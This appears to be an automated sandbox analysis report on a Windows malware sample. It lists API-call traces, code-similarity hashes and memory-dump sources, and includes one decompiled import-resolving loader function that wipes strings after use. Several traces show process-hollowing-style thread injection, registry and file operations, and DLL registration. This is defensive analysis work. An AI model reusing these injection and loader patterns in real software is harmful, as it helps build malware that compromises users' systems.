    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1F61, Relevance: 10.6, APIs: 7, Instructions: 110 Total matches: 25memoryfilestring
Similarity
  • Total matches: 25
  • API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy
  • String ID:
  • API String ID: 699546578-0
  • Opcode ID: 532f2b5cd79be1598055c22557b2267d7091050a8bc957485613e12867e2baf4
  • Instruction ID: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
  • Opcode Fuzzy Hash: 63F076B8404D85CBC62364B588AA7BE46457F824E5D0CE33AA584B101B1F0365B79F85
  • Instruction Fuzzy Hash: 7e10fe87f0924755e3c3f139aefbb8723367e80e6c71fdf06343399dbcc04d08
APIs
  • InterlockedIncrement.KERNEL32(001EAF5C), ref: 001C1F73
  • lstrcpy.KERNEL32(00000000), ref: 001C1FA8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
    • Part of subcall function 001DD17E: memset.NTDLL ref: 001DD192
  • HeapFree.KERNEL32(00000000,?), ref: 001C2050
    • Part of subcall function 001DD36B: memset.NTDLL ref: 001DD3C6
    • Part of subcall function 001DD36B: SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD36B: WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
    • Part of subcall function 001DD36B: Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
  • GetLastError.KERNEL32(00000000), ref: 001C2039
  • InterlockedDecrement.KERNEL32(001EAF5C), ref: 001C2067
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2098
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000), ref: 001C2088
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5816, Relevance: 10.6, APIs: 7, Instructions: 109 Total matches: 43stringsleepmemory
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2A39, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102 Total matches: 43memory
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32B25, Relevance: 10.6, APIs: 7, Instructions: 98 Total matches: 51file
Similarity
  • Total matches: 51
  • API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile
  • String ID:
  • API String ID: 587453859-0
  • Opcode ID: 284135ccc4a6042596739f0da6f5d139cb388ced26bcc24a24efab720d4ab4ef
  • Instruction ID: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
  • Opcode Fuzzy Hash: 8DF0E254229DC9CED11B608A12B3793A251EF33640D7C1797B422ADA068B61713F978A
